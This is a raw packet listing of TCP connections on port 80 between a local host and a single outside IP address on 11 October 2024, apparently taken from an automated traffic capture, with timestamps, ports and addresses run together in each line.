                                                                                                Oct 11, 2024 20:38:38.513282061 CEST80500375.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:38.809981108 CEST5003880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.815443039 CEST80500385.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:38.815551043 CEST5003880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.815675020 CEST5003880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.820548058 CEST80500385.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:38.857650995 CEST5003780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:38.862605095 CEST80500375.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:38.863105059 CEST80500375.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:39.170012951 CEST5003880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:39.290798903 CEST80500375.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:39.293463945 CEST80500385.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:39.293479919 CEST80500385.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:39.293529987 CEST80500385.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:39.319175005 CEST80500375.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:39.319422007 CEST5003780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:39.504086018 CEST80500385.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:39.591775894 CEST5003880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:39.633981943 CEST80500385.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:39.695575953 CEST5003880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:40.327095985 CEST5003780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:40.328569889 CEST5003980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:40.328666925 CEST5003880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:40.333478928 CEST80500375.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:40.333535910 CEST5003780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:40.333741903 CEST80500395.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:40.333991051 CEST5003980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:40.334319115 CEST80500385.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:40.334361076 CEST5003880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:40.337326050 CEST5003980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:40.342411995 CEST80500395.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:40.685940981 CEST5003980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:40.691147089 CEST80500395.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:40.691266060 CEST80500395.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:41.019238949 CEST80500395.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:41.147634983 CEST80500395.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:41.147692919 CEST5003980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.073805094 CEST5004080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.078761101 CEST80500405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.078843117 CEST5004080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.079010963 CEST5004080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.085242033 CEST80500405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.155556917 CEST5004180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.161976099 CEST80500415.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.162110090 CEST5004180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.162494898 CEST5004180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.168973923 CEST80500415.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.439129114 CEST5004080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.445683956 CEST80500405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.445777893 CEST80500405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.445790052 CEST80500405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.551562071 CEST5004180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.557784081 CEST80500415.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.557857990 CEST80500415.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.761137009 CEST80500405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.847465992 CEST80500415.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.888695955 CEST5004080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.891403913 CEST80500405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.893649101 CEST5004180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:42.899028063 CEST80500415.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:42.899089098 CEST5004180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:43.091886044 CEST5004080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:44.480247021 CEST5004080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:44.480545998 CEST5004280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:44.485877037 CEST80500425.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:44.485945940 CEST5004280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:44.486063957 CEST5004280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:44.486644030 CEST80500405.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:44.486768007 CEST5004080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:44.491393089 CEST80500425.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:44.842129946 CEST5004280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:44.847183943 CEST80500425.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:44.847208977 CEST80500425.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:45.172259092 CEST80500425.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:45.222601891 CEST5003980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:45.279352903 CEST5004280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:45.302998066 CEST80500425.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:45.388674021 CEST5004280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:46.318476915 CEST5004380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:46.318542004 CEST5004280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:46.323760986 CEST80500435.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:46.323872089 CEST5004380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:46.323996067 CEST5004380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:46.324165106 CEST80500425.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:46.324220896 CEST5004280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:46.329155922 CEST80500435.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:46.707222939 CEST5004380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:46.712409973 CEST80500435.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:46.712428093 CEST80500435.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:47.185225964 CEST5004480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:47.190274000 CEST80500445.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:47.190351009 CEST5004480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:47.190479994 CEST5004480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:47.195966959 CEST80500445.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:47.288727999 CEST5004380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:47.340470076 CEST80500435.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:47.545495987 CEST5004480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:47.550465107 CEST80500445.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:47.550487995 CEST80500445.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:47.550513029 CEST80500445.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:48.053354979 CEST80500445.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:48.191018105 CEST80500445.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:48.193804026 CEST5004480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:48.387075901 CEST5004480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:48.387667894 CEST5004580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:48.392628908 CEST80500455.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:48.392712116 CEST5004580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:48.392735958 CEST80500445.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:48.392870903 CEST5004480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:48.470120907 CEST5004580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:48.475042105 CEST80500455.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:48.889848948 CEST5004580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:48.894821882 CEST80500455.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:48.894921064 CEST80500455.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:49.095366955 CEST80500455.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:49.227150917 CEST80500455.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:49.227390051 CEST5004580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:49.812345028 CEST80500435.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:49.812468052 CEST5004380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:50.326150894 CEST5004680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:50.326395988 CEST5004580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:50.331438065 CEST80500465.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:50.331527948 CEST5004680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:50.331645966 CEST5004680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:50.331919909 CEST80500455.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:38:50.331988096 CEST5004580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:38:50.336900949 CEST80500465.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:07.815797091 CEST80500615.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:07.815817118 CEST80500615.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:08.149085045 CEST80500615.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:08.283118010 CEST80500615.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:08.283307076 CEST5006180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:08.297929049 CEST5006280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:08.303136110 CEST80500625.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:08.303247929 CEST5006280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:08.303364038 CEST5006280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:08.308413982 CEST80500625.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:08.654578924 CEST5006280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:08.659807920 CEST80500625.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:08.659828901 CEST80500625.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:08.659841061 CEST80500625.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:08.986346006 CEST80500625.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:09.044934988 CEST5006280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:09.115611076 CEST80500625.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:09.139978886 CEST5006280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:09.143774986 CEST5006380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:09.143939018 CEST5006180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:09.145817041 CEST80500625.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:09.145879984 CEST5006280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:09.148747921 CEST80500635.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:09.148811102 CEST5006380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:09.149144888 CEST80500615.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:09.149198055 CEST5006180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:09.151153088 CEST5006380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:09.155952930 CEST80500635.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:09.498414040 CEST5006380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:09.503535986 CEST80500635.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:09.503582001 CEST80500635.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:09.841893911 CEST80500635.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:09.888684988 CEST5006380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:09.977333069 CEST80500635.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:10.091814041 CEST5006380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:10.127229929 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:10.127262115 CEST5006380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:10.555563927 CEST80500645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:10.555653095 CEST80500635.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:10.555732012 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:10.555877924 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:10.555881023 CEST5006380192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:10.560964108 CEST80500645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:10.926929951 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.053735018 CEST5006580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.072520018 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.748049021 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.920528889 CEST5006680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.969885111 CEST80500645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:11.970087051 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.970293045 CEST80500645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:11.970350981 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.970398903 CEST80500645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:11.970446110 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.973678112 CEST80500645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:11.973745108 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.975465059 CEST80500645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:11.975522041 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.976500034 CEST80500645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:11.976536036 CEST80500655.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:11.976548910 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.976566076 CEST80500645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:11.976596117 CEST80500665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:11.976619959 CEST5006580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.976633072 CEST5006480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.976650953 CEST5006680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.976736069 CEST5006580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.976803064 CEST5006680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:11.981549025 CEST80500655.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:11.981688976 CEST80500665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:12.334964991 CEST5006580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:12.335028887 CEST5006680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:12.340174913 CEST80500655.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:12.340291023 CEST80500655.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:12.340318918 CEST80500665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:12.340373039 CEST80500665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:12.340399981 CEST80500665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:12.739557981 CEST80500655.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:12.739603043 CEST80500665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:12.792818069 CEST80500655.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:12.792865038 CEST80500665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:12.792891026 CEST5006580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:12.792936087 CEST5006680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.521945000 CEST5006580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.521994114 CEST5006680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.522226095 CEST5006780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.527175903 CEST80500675.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:13.527245045 CEST80500655.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:13.527296066 CEST5006780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.527311087 CEST5006580192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.527409077 CEST5006780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.527762890 CEST80500665.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:13.527812958 CEST5006680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.532152891 CEST80500675.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:13.592658043 CEST5006880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.597815037 CEST80500685.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:13.597937107 CEST5006880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.598022938 CEST5006880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.602924109 CEST80500685.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:13.873146057 CEST5006780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.878307104 CEST80500675.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:13.878329992 CEST80500675.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:13.878343105 CEST80500675.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:13.953983068 CEST5006880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:13.959184885 CEST80500685.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:13.959286928 CEST80500685.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:14.214337111 CEST80500675.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:14.273142099 CEST80500685.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:14.279320955 CEST5006780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:14.343511105 CEST80500675.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:14.388796091 CEST5006880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:14.388807058 CEST5006780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:14.404541016 CEST80500685.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:14.591780901 CEST5006880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.170686960 CEST5006780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.170715094 CEST5006880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.170952082 CEST5006980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.175991058 CEST80500685.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.176021099 CEST80500675.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.176057100 CEST5006880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.176099062 CEST5006780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.176261902 CEST80500695.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.176323891 CEST5006980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.176419973 CEST5006980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.181154013 CEST80500695.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.190095901 CEST5007080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.194953918 CEST80500705.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.195041895 CEST5007080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.195111990 CEST5007080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.199954987 CEST80500705.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.529434919 CEST5006980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.534416914 CEST80500695.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.534569979 CEST80500695.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.544970989 CEST5007080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.549988985 CEST80500705.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.550003052 CEST80500705.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.550014019 CEST80500705.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.868525028 CEST80500695.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.888916016 CEST80500705.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:15.935862064 CEST5006980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:15.982428074 CEST5007080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.001415014 CEST80500695.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:16.019853115 CEST80500705.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:16.044987917 CEST5006980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.091801882 CEST5007080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.748946905 CEST5006980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.749037027 CEST5007080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.749315023 CEST5007180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.754410982 CEST80500715.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:16.754513979 CEST5007180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.754615068 CEST5007180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.754741907 CEST80500695.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:16.754822016 CEST5006980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.755950928 CEST80500705.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:16.756014109 CEST5007080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.760318041 CEST80500715.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:16.783624887 CEST5007280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.788548946 CEST80500725.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:16.788633108 CEST5007280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.788711071 CEST5007280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:16.793785095 CEST80500725.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:17.107522011 CEST5007180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:17.112694979 CEST80500715.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:17.112848043 CEST80500715.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:17.138820887 CEST5007280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:17.143731117 CEST80500725.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:17.144040108 CEST80500725.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:17.144145012 CEST80500725.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:17.494836092 CEST80500725.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:17.591806889 CEST5007280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:17.628961086 CEST80500725.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:17.779299021 CEST5007280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:17.910679102 CEST80500725.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:33.520241976 CEST5008780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:33.520337105 CEST5008780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:33.520381927 CEST80500865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:33.520431995 CEST5008680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:33.525669098 CEST80500875.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:33.873148918 CEST5008780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:33.878330946 CEST80500875.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:33.878710032 CEST80500875.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:34.263164997 CEST80500875.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:34.344012976 CEST5008880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:34.349698067 CEST80500885.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:34.349775076 CEST5008880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:34.349879980 CEST5008880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:34.354758024 CEST80500885.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:34.384917021 CEST80500875.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:34.385014057 CEST5008780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:34.701384068 CEST5008880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:34.706842899 CEST80500885.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:34.706907988 CEST80500885.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:34.706952095 CEST80500885.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:34.951735973 CEST5008780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:34.951973915 CEST5008980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:34.957077980 CEST80500875.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:34.957148075 CEST5008780192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:34.957777023 CEST80500895.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:34.957886934 CEST5008980192.168.2.55.42.66.51
